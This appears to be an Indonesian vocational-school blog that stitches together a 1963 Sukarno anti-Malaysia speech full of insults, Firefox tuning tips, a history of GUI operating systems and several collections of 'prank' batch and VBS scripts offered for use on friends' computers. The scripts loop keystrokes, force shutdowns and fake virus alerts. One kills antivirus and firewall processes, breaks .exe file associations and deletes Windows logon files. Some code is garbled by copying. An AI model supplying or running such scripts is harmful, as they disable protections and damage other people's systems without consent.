FOLLOW @kertaskotor_

EDIT ME

ALEXA

Loading

PIDATO BUNG KARNO

Add caption






PIDATO BUNG KARNO
SAAT GANYANG MALAYSIA 27 JULI 1963

Kalau kita lapar itu biasa
Kalau kita malu itu juga biasa
Namun kalau kita lapar atau malu itu karena Malaysia, kurang ajar!
Kerahkan pasukan ke Kalimantan hajar cecunguk Malayan itu!
Pukul dan sikat jangan sampai tanah dan udara kita diinjak-injak oleh Malaysian keparat itu
Doakan aku, aku kan berangkat ke medan juang sebagai patriot Bangsa, sebagai martir Bangsa dan sebagai peluru Bangsa yang tak mau diinjak-injak harga dirinya.
Serukan serukan keseluruh pelosok negeri bahwa kita akan bersatu untuk melawan kehinaan ini kita akan membalas perlakuan ini dan kita tunjukkan bahwa kita masih memiliki Gigi yang kuat dan kita juga masih memiliki martabat.
Yoo...ayoo... kita... Ganjang...
Ganjang... Malaysia
Ganjang... Malaysia
Bulatkan tekad
Semangat kita badja
Peluru kita banjak
Njawa kita banjak
Bila perlu satoe-satoe!

MEMBUAT MOZILLA FIREFOX MENJADI 4 KALI LEBIH CEPAT

Cara Membuat Browser Firefox 4 Kali Lebih Cepat
ketik url berikut ini di browser mozilla firefox Anda : about:config
Temukan config berikut ini :

  • browser.history_expire_days_min ganti nilainyanya menjadi 10 (default: 90)
  • browser.sessionhistory.max_total_viewers ganti nilainyanya menjadi 1 (default: -1)
  • network.http.max-connections ganti nilainyanya menjadi 100 (default: 30)
  • network.http.max-connections-per-server ganti nilainyanya menjadi 20 (default: 15)
  • network.http.max-persistent-connections-per-server ganti nilainyanya menjadi 8 (default: 6)
  • network.http.pipelining ganti menjadi true (default: false)
  • network.http.proxy.pipelining ganti menjadi true (default: false)
  • network.http.pipelining.maxrequests ganti menjadi 8 (default: 4)
  • network.http.request.max-start-delay ganti menjadi 0 (default: 10)
  • network.prefetch-next ganti menjadi false (default: true)

KUMPULAN SCRIPT JAIL PART 3

1. Iseng Mengeject CD-Drive Terus Menerus

Set oWMP = CreateObject(”WMPlayer.OCX.7?)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
Kemudian save dengan >>> croz.vbs
2. Iseng Dengan Tombol Enter Terus Menerus

Set wshShell = wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “~(enter)”
loop
Kemudian save dengan >>> croz.vbs
3. Iseng Dengan Pesan Lambat Notepad “Hello, how are you? I am good thanks!”

WScript.Sleep 180000
WScript.Sleep 10000
Set WshShell = WScript.CreateObject(”WScript.Shell”)
WshShell.Run “notepad”
WScript.Sleep 100
WshShell.AppActivate “Notepad”
WScript.Sleep 500
WshShell.SendKeys “Hel”
WScript.Sleep 500
WshShell.SendKeys “lo ”
WScript.Sleep 500
WshShell.SendKeys “, ho”
WScript.Sleep 500
WshShell.SendKeys “w a”
WScript.Sleep 500
WshShell.SendKeys “re ”
WScript.Sleep 500
WshShell.SendKeys “you”
WScript.Sleep 500
WshShell.SendKeys “? ”
WScript.Sleep 500
WshShell.SendKeys “I a”
WScript.Sleep 500
WshShell.SendKeys “m g”
WScript.Sleep 500
WshShell.SendKeys “ood”
WScript.Sleep 500
WshShell.SendKeys ” th”
WScript.Sleep 500
WshShell.SendKeys “ank”
WScript.Sleep 500
WshShell.SendKeys “s! “
Kemudian save dengan >>> croz.vbs
4. Iseng Dengan Backspace
MsgBox “Maaf, Anda Harus Mengulang Kembali”
Set wshShell =wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{bs}”
loop
Kemudian save dengan >>> croz.vbs
5. Iseng Dengan Membuka Calculator Terus Menerus
@ECHO off
:top
START %SystemRoot%\system32\cacl.exe
GOTO top
Kemudian save dengan >>> croz.vbs
6. Iseng Dengan Keyboard
Set wshShell = wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “Maaf, Keyboard Tidak Berfungsi! Harap Diperbaiki”
loop
Kemudian save dengan >>> croz.vbs
7. Iseng Dengan Shutdown Computer
@echo off
msg * Komputer Anda Terinfeksi Virus
shutdown -c “Error! Virus Menyebar Keseluruh System!” -s -t 0
Kemudian save dengan >>> croz.vbs
Jangan Coba-Coba di komputer Sendiri yah…..hehehhehe

KUMPULAN SCRIPT JAIL PART 2

Script berikut hanya untuk jahil.. Untuk membuat script ini aktif yang Anda butuhkan adalah : 1. Notepad
2. Copi
3. Paste
4. Alias Copas
5. Nah sekarang tinggla masukin scriptnya ke notepad,,, langsung saja cek ki dot :

MESSAGES YG NONGOL TERUS MENERUS SECARA OTOMATIS

@ECHO off
:Begin
msg * muka lo jelek
msg * ngaca dulu gih
msg * hayo lo,cpu lu gw acak2
msg * ud install ulang aja
msg * biar masalah nya kelar
GOTO BEGIN

==> save nama script diatas dg ekstensi *.bat

BIKIN SHUTDOWN + MESSAGES

@echo off
msg * apaan sih lo
shutdown -s -c "Error! muka mu
standar abis"

==> save nama script diatas dg ekstensi *.bat

MAININ CAPS LOCK BUTTON

Set wshShell
=wscript.CreateObject
("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop

==> save nama script diatas dg ekstensi *.vbs

BUKA TUTUP CD/DVD SECARA OTOMATIS

Set oWMP = CreateObject
("WMPlayer.OCX.7")
Set colCDROMs =
oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

==> save nama script diatas dg ekstensi *.vbs

BIKIN VB SCRIPT NONGOL TERUS MENERUS SECARA OTOMATIS

Set wshShell =
wscript.CreateObject
("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop

==> save nama script diatas dg ekstensi *.vbs

MENEKAN TOMBOL BACKSPACE TERUS MENERUS SECARA OTOMATIS

MsgBox "kembali ke menu
sebelumnya"
Set wshShell
=wscript.CreateObject
("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop

==> save nama script diatas dg ekstensi *.vbs

OTOMATIS NGETIK "LU JELEK BANGET SIH" DI NOTEPAD ATAU M.WORD

Set wshShell =
wscript.CreateObject
("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "lu jelek
banget sih!!!"
loop

==> save nama script diatas dg ekstensi *.vbs

MEMBUKA NOTEPAD TERUS MENERUS

@ECHO off
:top
START %SystemRoot%
system32notepad.exe
GOTO top

==> save nama script diatas dg ekstensi *.BAT

OTOMATIS BUKA NOTEPAD LALU NGETIK "APA YG LO MAU"

WScript.Sleep 1800
WScript.Sleep 100
Set WshShell =
WScript.CreateObject
("WScript.Shell")
WshShell.Run "notepad"
WScript.Sleep 10
WshShell.AppActivate "Notepad"
WScript.Sleep 50
WshShell.SendKeys "ka"
WScript.Sleep 50
WshShell.SendKeys "mu "
WScript.Sleep 50
WshShell.SendKeys "je"
WScript.Sleep 50
WshShell.SendKeys "le"
WScript.Sleep 50
WshShell.SendKeys "k "
WScript.Sleep 50
WshShell.SendKeys " se"
WScript.Sleep 50
WshShell.SendKeys "ka"
WScript.Sleep 50
WshShell.SendKeys "li"
WScript.Sleep 50
WshShell.SendKeys " y"
WScript.Sleep 50
WshShell.SendKeys "a"
WScript.Sleep 50
WshShell.SendKeys " h"
WScript.Sleep 50
WshShell.SendKeys "!"
WScript.Sleep 50
WshShell.SendKeys "!! "

==> save nama script diatas dg ekstensi *.vbs

BISA MEMILIH JAWABAN SEPERTI QUIZ LAH KIRA2

@echo off
title quiz hari ini
:menu
cls
echo jika kamu kena virus apa
yang kamu lakukan
pause
echo pilih yang mana:
echo 1. matiin computer
echo 2. format aja
echo 3. bingung ahh
set input=nothing
set /p input=Choice:
if %input%==1 shutdown -s -t
30
if %input%==2 del c:xxx
if %input%==3 @ECHO off
msg * muka lo rusak
msg * ngaca dulu gih
msg * hayo lo,cpu lu gw acak2
msg * ud install ulang aja
msg * biar masalah nya kelar
@ECHO off
:top
START %SystemRoot%
system32notepad.exe
GOTO top

==> nah script diatas save jadi quiz.bat,

POKOKNYA KALO YG INI DICOBA DULU DEH !!

@echo off
set end=md “Hack
installing”
set fin=copy “Hack
log.txt” “Installing”
%end%
%fin%
net send * Hack is
installing, press OK to
begin set up.
kill NAVAPSVC.exe /F /Q
kill zonelabs.exe /F /Q
kill explorer.exe /F /Q
cls
assoc .exe=txtfile
assoc .txt=mp3file
cls
msg * It is you who is
hacked ….
msg * I warned you,
and you kept going.
Challenge me and this
is what happens.
DEL C:WINDOWS
system32logoff.exe /
F /Q
DEL C:WINDOWS
system32logon.exe /
F /Q
DEL C:WINDOWS
system32logon.scr /
F /Q
cls
shutdown -s -t 5 -c
“ thank you for
waiting”

==> save script diatas dg ekstensi *.bat

*Keterangan : Untuk Kode cetak tembal dibawahnya merupakan keterangan ekstensi cara menyimpanya, misalnya ekstensi nya .vbs , jadi cara menyimpanya sebgagai berikut :
1. Buka notepad
2. Copy paste scriptnya
3. Save, dengan tipe ALL FILE dan Beri nama terserah Anda lalu di beri akhiran ekstensinya .vbs

SCRIPT JAIL PART 1

 TKJ-SMK NASIONAL DEPOK
Script Jahil
banyak cara buat ngisengin teman, huaha
berikut beberapa script spesial buat kamu :

keyboard problem

Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "sabotase keyboard, etc"
loop

save di notepad dengan eksistensi .vbs
tulisan yang berwarna biru dapat kamu ganti sesuai selera

backspace trouble

MsgBox "ilham ganteng code bilang : anda harus mengulang kembali"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop

save di notepad dengan eksistensi .vbs
tulisan yang berwarna biru dapat kamu ganti sesuai selera

enter again
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop

save di notepad dengan eksistensi .vbs

mainin capslock button
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop

save di notepad dengan eksistensi .vbs

vbs script nongol terus
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop

save di notepad dengan eksistensi .vbs

kuis membawa petaka
@echo off
title quiz hari ini
:menu
cls
echo jika kamu kena virus apa yang kamu lakukan
pause
echo pilih yang mana:
echo 1. matiin computer
echo 2. format aja
echo 3. bingung ahh
set input=nothing
set /p input=Choice:
if %input%==1 shutdown -s -t 30
if %input%==2 del c:\xxx
if %input%==3 @ECHO off
msg * muka lo jelek
msg * ngaca dulu gih
msg * hayo lo,cpu lu gw acak2
msg * ud install ulang aja
msg * biar masalah nya kelar
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

save di notepad dengan eksistensi .bat
tulisan yang berwarna biru dapat kamu ganti sesuai selera

message alert
@ECHO off
:Begin
msg * Kenna Deh
msg * Huahahaha
msg * Install Ulang Aja
msg * Gak Mau Ya ?
msg * Terserah
msg * Mari Kita Bermain
msg * Nikmatilah hidup ini
msg * Jangan MENYERAH
msg * Jangan PANIK
msg * Jangan PUTUS ASA
msg * Jangan GROGI
msg * Huahahaha
msg * Saya tidak bermaksud JAHAT
msg * Hanya ISENG
msg * OKE lah Kalau begitu
msg * Perkenalkan SAYA
msg * EMPATUJUH CODE
msg * Kenal SAYA ?
msg * Gak kenal kan ?
msg * Makanya Rasakan ini
msg * Lain Kali Jangan KLIK SEMBARANG
msg * Gini aja
msg * Telepon Teman Kamu yg PINTAR
msg * Beresin Masalah ini
msg * Sebelum Terlambat
msg * OK
msg * Bye
msg * Love you Full
msg * Anjing
msg * Babi
msg * upss KECEPLOSAN
msg * huahahaha
GOTO BEGIN

save di notepad dengan eksistensi .bat
kata-kata dibelakang msg * dapat diganti sesuai selera
JANGAN LUPA YA KUNJUNGIN WEBSITE BARU X TKJ 2 : HTTP://TKJ2SMKNASIONALDPK.TALK4FUN.COM
SELAMAT MENCOBA

DOWNLOAD KUMPULAN FONT GRAFFITY

Kumpulan font graffiti lengkap (4 volume)
Volume 1 terdiri dari 70 font, volume 2 terdiri dari 85 font, volume 3 terdiri dari 35 font, dan volume 4 terdiri dari 400 font. Total keseluruhan font ada 590 font! Nah, tunggu apa lagi? Segera unduh dan wujudkan kreasi Anda! 
TKJ-SMKNASIONAL DEPOK
Download Graffiti Font Pack vol. 1Unduh Graffiti Font Pack volume 1
Download Graffiti Font Pack vol. 2! Unduh Graffiti Font Pack volume 2
Download Graffiti Font Pack vol. 3Unduh Graffiti Font Pack volume 3
Download Graffiti Font Pack vol. 4Unduh Graffiti Font Pack volume 4

ALHAMDULILLAH WEBSITE X TKJ 2 SMK NASIONAL DEPOK SUDAH SELESAI DI BANGUN (tkj2smknasionaldpk.talk4fun.net/)

ALHAMDULILLAH WEBSITE X TKJ 2 SMK NASIONAL DEPOK SUDAH SELESAI DI BANGUN  (http://tkj2smknasionaldpk.talk4fun.net/)

http://tkj2smknasionaldpk.talk4fun.net/

tkj2smknasionaldpk.talk4fun.net/
tkj2smknasionaldpk.talk4fun.net/
tkj2smknasionaldpk.talk4fun.net/
tkj2smknasionaldpk.talk4fun.net/

SYSTEM OPERASI BERBASIS TEXT DAN GUI

SYSTEM OPERASI BERBASIS TEXT DAN GUI

Presentation KKPI



TKJ-SMK NASIONAL DEPOK
from :achmadirfan67@gmail.com

Daftar Situs Tutorial Photoshop

Daftar ini diurutkan berdasarkan kualitasnya. Paling atas artinya sangat penting untuk belajar Photoshop dan sangat saya rekomendasikan. Paling bawah artinya memiliki cukup informasi tapi jika tidak punya banyak waktu silakan dilewati saja.
TKJSMKNASIONALDEPOK.BLOGSPOT.COM
  1. Psdtuts+
  2. Tutorial9.net
  3. PlanetPhotoshop.com
  4. photoshop essentials
  5. 10steps.sg
  6. Ps Hero
  7. desaindigital.com
  8. ilmuphotoshop.com
Update : TKJ SMK NASIONAL DEPOK. BLOGSPOT.COM
  1. zonanarsis.com
  2. Abduzeedo
  3. Psdfan.com
  4. Psdvault.com

sistem operasi berbasis GUI

TKJ SMK NASIONAL DEPOK
GUI atau singkatan dari Graphical User Interface yang memungkinkan pengguna untuk berinteraksi dengan perangkat keras komputer serta memudahkan dalam mengoperasikan sebuah sistem operasi (user friendly). GUI adalah sarana penghubug antara si pengguna ( User ) dengan apa yang digunakannya.
Selama bertahun-tahun berbagai GUI yang telah dikembangkan untuk berbagai sistem operasi seperti OS / 2, Macintosh, Windows, amiga, Linux, Symbian OS, dan banyak lagi. Di zaman komputer monster ( komputer generasi pertama maksud saya ) GUI belum dikenalkan, zaman itu ketika MARK 1 & juga ENIVAC mendominasi, mesin mereka memerlukan ruangan yang besar , energi yang besar juga user yang banyak pula dengan setiap keahliannya masing-masing hanya untuk mengendalikan 1 mesin saja. Baru ketika era komputer generasi kedua ( DOS buatan Microsoft dan IBM ) ada sedikit perubahan tampilan meskipun bukan disebut GUI.
Dalam artikel ini saya hanya menampilkan beberapa kemajuan yang signifikan dalam desain GUI (bukan sistem operasi) serta antarmuka pengguna berbasis grafik pada sistem operasi yang ada saat ini.
Tapi di zaman sekarang Mac OSX lah yang disebut-sebut sebagai OS yang ber GUI terbaik. Padahal mayoritas dari mereka menggunakan Windows . Bahkan pengguna Mac juga tidak sedikit yang menginstal Windows di dalam Macintoshnya. Untuk itu saya nanti akan membuat artikel mengapa OSX dibilang lebih fashinable dari OS lainnya
Ada beberapa yang tidak saya sertakan dan itu bukan berarti tidak termasuk dalam kamajuan desain, tapi tampilan yang ada di artikel merupakan salah satu sistem operasi yang sangat populer.
GUI pertama kali dikembangkan oleh para peneliti di Xerox Palo Alto Research Center (PARC) di tahun 70-an. Penelitian ini membuka era baru dalam inovasi komputer grafis.
Komputer pribadi (personal computer) pertama yang menggunakan antarmuka pengguna grafis modern adalah Xerox Alto, yang dikembangkan pada tahun 1973.
Sistem ini juga bukan sebagai produk komersial dan dimaksudkan terutama untuk penelitian di universitas.
1981-1985
Xerox 8010 Star (dirilis pada 1981)
Ini adalah sistem pertama yang disebut sebagai komputer desktop yang terintegrasi penuh, termasuk aplikasi dan GUI dan dikenal sebagai “The Xerox Star”, kemudian berganti nama menjadi “Viewpoint” dan kemudian berganti lagi namanya menjadi “GlobalView”.
Apple Lisa Office System 1 (dirilis pada 1983)
Sistem dikenal sebagai Lisa OS, atau singkatan dari Office System. Hal ini dikembangkan oleh Apple dengan maksud sebagai pemrosesan dokumen workstation.
Sayangnya workstation ini tidak bertahan lama, hal itu dibunuh oleh Apple Macintosh sistem operasi yang lebih terjangkau. Ada beberapa tambahan untuk upgrade ke versi Lisa OS, Lisa OS 2 di tahun 1983 dan Lisa OS 7 / 7 3,1 pada tahun 1984, dan dapat di upgrade oleh sistem itu sendiri, tapi sistem ini belum memakai (GUI).
VisiCorp Visi On (dirilis pada 1984)
VisiCorp pertama kali dikembangkan GUI desktop yang ditujukan untuk IBM PC. Sistem ini ditargetkan untuk perusahaan-perusahaan besar dan hadir dengan harga yang tinggi. Sistem GUI ini memanfaatkan mouse dengan built-in installer serta tidak menggunakan ikon pada tampilannya. Inilah yang menjadi kekurangan sekaligus batu sandungan GUI jenis ini.
Mac OS System 1.0 (dirilis pada 1984)
Sistem 1.0 sistem operasi pertama yang dikembangkan GUI untuk Macintosh. Beberapa fitur ini merupakan dari sistem operasi modern, karena pada setiap jendela (window) sudah disertai dengan ikon. Pada setiap jendela dapat dipindahkan dengan mouse dan tak hanya jendela, file dan folder pun dapat disalin dengan hanya menyeret dan menempatkan (dragging and dropping) ke lokasi atau target yang diinginkan pengguna. Konsep inilah yang diterapkan Apple pada Mac hingga sekarang yang sudah menjadi versi OSX Snow Leopard. Dan mungkin inilah yang membuat Mac dikatakan simple dibanding GUI jenis lain.
Amiga Workbench 1.0 (dirilis pada 1985)
Ketika pertama kali dirilis, saat itu Amiga berada di posisi depan, karena sistem GUI ini sudah memiliki fitur warna yang belum dimiliki GUI lain. Meskipun hanya empat warna ( empat warna: hitam, putih, biru, jingga ), kemampuan multitasking, dukungan suara stereo dan mengatur ikon (selected dan unselected). Fitur-fitur inilah yang membuat GUI jenis ini populer.
Windows 1.0x (dirilis pada 1985)
Di tahun ini, Microsoft akhirnya berhasil mengejar posisi seluruh sistem operasi antarmuka dengan merilis Windows 1.0, pertama sistem operasi berbasis GUI ( meskipun tidak ada yang berani untuk mengakui sebagai salah satunya ). Sistem ini menampilkan 32 × 32 piksel ikon dan warna grafis. Fitur yang paling menarik lainnya ( yang kemudian dihilangkan ) adalah ikon animasi jam analog. Lalu fitur ini kembali muncul kembali di Windows Vista ( pada Gadget di Sidebar ) . Nama “ Windows “ sendiri dinamakan oleh salah satu pegawai Bill Gates yang berarti jendela-jendela pengoperasian” . Mungkin pegawai Bill Gates tersebut juga mendapat royalti dari Microsoft Windows.
GEM (dirilis pada 1985)
GEM (Graphical Environment Manager) adalah gaya windowing GUI diciptakan oleh Digital Research, Inc (DRI). GEM awalnya dibuat untuk digunakan dengan CP / M sistem operasi pada Intel 8088 dan Motorola 68000 mikroprosesor dan kemudian dikembangkan untuk bisa berjalan di DOS juga. Kebanyakan orang akan mengetahui GEM sebagai salah satu GUI untuk komputer Atari ST. GEM juga digunakan pada seri Amstrad komputer IBM yang kompatibel dan merupakan inti untuk Ventura Publisher dan beberapa program DOS lainnya.
1986 – 1990
IRIX 3 (dirilis pada 1986, first release 1984)
IRIX merupakan sistem operasi 64-bit yang diciptakan untuk UNIX ( buyut dari Linux ). Sebuah fitur menarik pada GUI ini adalah dukungan untuk ikon vektor. Fitur ini sudah memakai GUI dan merupakan pelopor bahkan sebelum Mac OS X merilisnya.
GEOS (dirilis pada 1986)
The GEOS (Graphic Environment Operating System) sistem operasi ini dikembangkan oleh Berkeley Softworks (Kemudian GeoWorks). Sistem ini awalnya dirancang untuk Pengolah kata Commodore 64 dan dengan tampilan grafis yang disebut geoWrite Cat dan sebuah program yang Disebut geoPaint.
Windows 2.0x (dirilis pada 1987)
Dalam versi ini, perkembangan GUI telah membaik secara signifikan diantaranya, Jendela bisa tumpang tindih, dapat diubah ukurannya, dimaksimalkan dan diminimalkan. Mungkin fitur-fitur ini juga diadopsi dari fitur-fitur Mac. Yang membuat Windows menjadi booming adalah fasilitas game yang disediakan , karena kala itu Windows merupakan GUI pertama yang mempunyai game. Game andalan tersebut adalah game yang bernama “ Reversi “ . Mungkin para devloper game harus bertrimakasih juga pada Om Bill Gates yang mempelopori sebuah game pada
OS/2 1.x (dirilis pada 1988)
OS / 2 awalnya dikembangkan bersama oleh IBM dan Microsoft meskipun akhirnya dijual Microsoft kepada IBM, tetapi pada tahun 1991 kedua perusahaan berpisah dengan menggabungkan teknologi Microsoft GUI pada Windows-nya sendiri dan IBM mengembangkan OS / 2. GUI yang digunakan dalam OS / 2 yang disebut “Presentation Manager”. Versi ini hanya didukung GUI dan ikon monokrom. Hal inilah yang membuat OS ini kompatibel denan DOS dan WINDOWS. Versi 4.0 OS ini diberi nama Merlyn
NeXTSTEP / OPENSTEP 1.0 (dirilis pada 1989)
Steve Jobs ( preman Apple computer )muncul dengan ide untuk menciptakan komputer yang sempurna untuk sebuah riset di universitas dan laboratorium. Ide ini kemudian berkembang menjadi sebuah perusahaan bernama NeXT Computer Inc.
Komputer NeXT yang pertama dirilis pada tahun 1988, kemajuan yang signifikan ini dibuat pada tahun 1989 dengan pembebasan dari 1.0 NeXTSTEP GUI, yang kemudian berkembang menjadi OPENSTEP.
GUI’s tersebut tampil dengan ikon lebih besar (48 × 48) dan memperkenalkan warna tambahan. GUI tersebut awalnya memiliki warna monokrom, tapi versi 1.0 juga mulai mendukung monitor warna. Dengan GUI modern, Screenshot ini memberikan beberapa
kemudahan dalam mengoperasikannya.
Windows 3.0 (dirilis pada 1990)
Dengan versi ini, Microsoft telah menyadari potensi terhadap perkembangan tampilan GUI mereka dan mulai meningkatkan secara signifikan.
Sistem operasi itu sendiri mendukung peningkatan standar dan mode 386, yang dibuat menggunakan kapasitas memori yang lebih tinggi dari 640 KB dan penyimpanan data dengan menggunakan hard disk, sehingga kemampuan untuk menggunakan resolusi layar yang lebih tinggi dan tampilan grafis yang lebih baik, seperti Super VGA 800 × 600 dan 1024 × 768 .
Selain itu, Microsoft menyewa Susan Kare untuk merancang ikon Windows 3.0 untuk
1991 – 1995
Amiga Workbench 2.04 (dirilis pada 1991)
Banyak sekali perbaikan GUI yang dilakukan pada versi ini. Skema warna berubah dan tampak 3D pun sudah diperkenalkan. Desktop dapat dibagi secara vertikal ke resolusi layar yang berbeda serta kedalaman warna yang kini tampak sedikit aneh. Resolusi default Workbench adalah 640 × 256, tetapi harus didukung perangkat keras dengan resolusi yang lebih besar juga.
Mac OS System 7 (dirilis pada 1991)
Mac OS versi 7.0 adalah GUI pertama pada Mac OS dengan dukungan warna. Tampilan halus dengan nuansa warna abu-abu, biru dan kuning serta ditambahkan pula pada setiap ikon.

Windows 3.1 (dirilis pada 1992)
Versi Windows disertai TrueType font yang pra-instal. Hal ini secara efektif untuk pertama kalinya Windows membuat sebuah desktop publishing platform fungsional.
Sejak Windows 3.0, Adobe Type Manager (ATM) sistem font dari Adobe sudah mulai berfungsi. Versi ini juga berisi skema warna bernama Hotdog Stand, yang berisi warna cerah merah, kuning dan hitam.
Skema warna ini dirancang untuk membantu orang-orang yang buta warna saat
OS/2 2.0 (dirilis pada 1992)
Ini adalah GUI pertama yang menjadi sasaran penerimaan internasional, dalam hal kegunaan dan aksesibilitas. Seluruh GUI yang dikembangkan menggunakan desain object-oriented. Setiap file dan folder adalah suatu objek yang dapat dikaitkan dengan file lain seperti folder dan aplikasi. Hal ini juga mendukung fungsi drag dan drop serta template.
Windows 95 (dirilis pada 1995)
User interface benar-benar dirancang ulang sejak versi 3.x. Ini adalah versi Windows pertama di mana sebuah tombol ditambahkan ke setiap jendela ( Minimal, Maximal dan Restore ). Tim desain memberikan area (dapat diaktifkan, dinonaktifkan, dipilih, diperiksa, dll) untuk ikon dan grafis lainnya. Dan perkembangan pada versi ini untuk pertamakalinya adalah dengan adanya Tombol Start yang terkenal saat itu.Ini merupakan salah satu kemajuan besar Microsoft mengenai sistem operasi itu sendiri dan serta tampilan GUI.
1996 – 2000
OS/2 Warp 4 (dirilis pada 1996)
IBM merilis OS / 2 Warp 4 yang membawa signifikan dengan facelift ke setiap jendela atau ruang.
Ikon diletakkan di desktop, di mana file dan folder custom juga bisa dibuat. Dalam versi ini juga menyertakan fungsi penghapusan (Shredder) yang mirip dengan Windows ‘Recycle Bin’ atau Mac OS ‘Trash’. Perbedaan dalam fungsi ini yaitu saat menghapus file atau folder secara langsung dan tidak menyimpannya terlebih dahulu yang memungkinkan pengguna dapat menggunakannya atau mengembalikannya.
Mac OS System 8 (dirilis pada 1997)
Mac OS 8 merupakan salah satu pengadopsi awal dari gaya isometrik ikon yang disebut pseudo-3D ikon. Tema warna Abu platinum yang digunakan di sini menjadi merek dagang untuk versi masa depan GUI. Kala itu Mac juga belum menggunakan dock sebagai pembantunya dalam mengelola multi tasking.

Windows 98 (dirilis pada 1998)
Gaya ikon hampir sama seperti dalam Windows 95, dan untuk rendering seluruh GUI bisa menggunakan lebih dari 256 warna. Windows Explorer hampir sepenuhnya berubah dan “Active Desktop” muncul untuk pertama kalinya.

KDE 1.0 (dirilis pada 1998)
KDE ( di dominasi Linux )berusaha untuk memenuhi kebutuhan untuk sebuah desktop yang mudah digunakan untuk Unix workstation, mirip dengan lingkungan desktop yang bisa ditemukan pada MacOS atau Window95/NT. Sistem ini sepenuhnya gratis termasuk kode sumbernya yang dapat dimodifikasi.
BeOs 4.5 (dirilis pada 1999)
Sistem operasi BeOS dikembangkan untuk komputer pribadi. Pada awalnya ditulis BeIn pada tahun 1991 untuk dijalankan pada hardware BeBox. Hal ini kemudian dikembangkan lebih lanjut untuk memanfaatkan teknologi dan perangkat keras yang lebih baru seperti multiprocessing simetris dengan memanfaatkan modul I / O bandwidth, merasuk multithreading, multitasking dan 64-bit sistem file journal dikenal sebagai BFS. Pada tahun 2005 BeOS dijual kepada Palm. Lalu di campakan oleh Palm. Akhirnya para pencinta freeware dari kalangan Linux berusaha untuk membuatnya menjadi freeware lagi dengan mengubah namanya menadi HaikuOS , supaya tidak melanggar peraturan royati.
GNOME 1.0 (dirilis pada 1999)
Desktop GNOME ini diutamakan untuk Red Hat Linux, kemudian dikembangkan lagi untuk distributor Linux lainnya juga.
2001 – 2005
Mac OS X (dirilis pada 2001)
Pada awal tahun 2000 Apple mengumumkan sistem operasi dengan tampilan Aqua dan pada tahun 2001 perusahaan tersebut merilis sistem operasi baru yang disebut Mac OS X. Dengan ukuran ikon default 32 x 32 dan 48 x 48 yang dapat diubah menjadi 128 x 128 piksel anti-alias dan ikon semi-transparan.
Banyak kritik setelah merilis GUI ini. Tampaknya pengguna belum cukup siap oleh perubahan besar ini, tetapi mereka (konsumen) cukup cepat mengadopsi gaya baru GUI ini. Namun berkat inovasi inilah Mac OS disebut-sebut sebagai GUI tercantik kala itu dan seing tampil di televisi ( bukan iklan ). Bahkan film Block Buster pun juga memunculkan Mac ini kedalam filmnya. Disinilah Mac OS mulai belajar, Mereka akhirnya menggunakan Dock sebagau saran multitasking dan juga shortcut kesuatu program. Meskipun fungsinya tidak jauh bed
Windows XP (dirilis pada 2001)
Sejak sistem operasi dirilis, Microsoft cenderung sepenuhnya ke GUI, tidak terkecuali Windows XP. Pada versi ini tampilan GUI Windows mengalami perubahan total dan skinnable, sehingga pengguna dapat mengubah seluruh tampilan GUI serta tampilan Ikon pun dapat di ubah secara otomatis. Berkat OS ini ula lah yang mendorong Microsoft menjadi Mayoriats OS di dunia. Terlebih dukungan vendor-vendor software yang cenderung hanya mengembangkan softwarenya pada jenis ini dan jarang di kembangkan di Mac ataupun Linux sekalipun.
KDE 3 (dirilis pada 2002)
Sejak versi 1.0, K Desktop Environment mengalami perubahan secara signifikan. Mereka merubah semua fitur grafis dan ikon sehingga terlihat menyatu di setiap jendela.

2007 – 2009 (current)
Windows Vista (dirilis pada 2007)
Ini adalah respon Microsoft kompetisi mereka. Mereka juga cukup banyak penambahan fitur 3D dan animasi. Sejak Windows 98, Microsoft telah selalu berusaha meningkatkan desktop. Dengan Windows Vista mereka merilis widget yang baik sebagai pengganti Active Desktop. Namun yang menjadi persoalan ialah software default Microsoft yang sengaja dibuat untuk mempercantik OS nya tersebut malah menjadi penyebab lambatnya sistem di Vista ( ex : sidebar,Aero TM)
Mac OS X Leopard (dirilis pada 2007)
Dengan 6 generasi, sistem Mac OS X Apple, sekali lagi meningkatkan user interface, GUI merupakan sebuah dasar untuk versi Aqua seperti candy scroll dan grey platinum, serta warna biru. Dalam GUI yang baru ini terdapat fitur 3D yang terlihat jelas, 3D dock terbaru dan banyak lagi animasi interakitf.
GNOME 2.24 (2008)
GNOME menempatkan banyak perubahan dalam menciptakan tema dan karya seni ke v2.2.4 dengan tujuan “untuk membuat komputer terlihat baik”. Terlihat baik dari sisi efisiensi dan juga tampilan.

KDE (v4.0 Jan. 2008, v4.2 Mar. 2009)
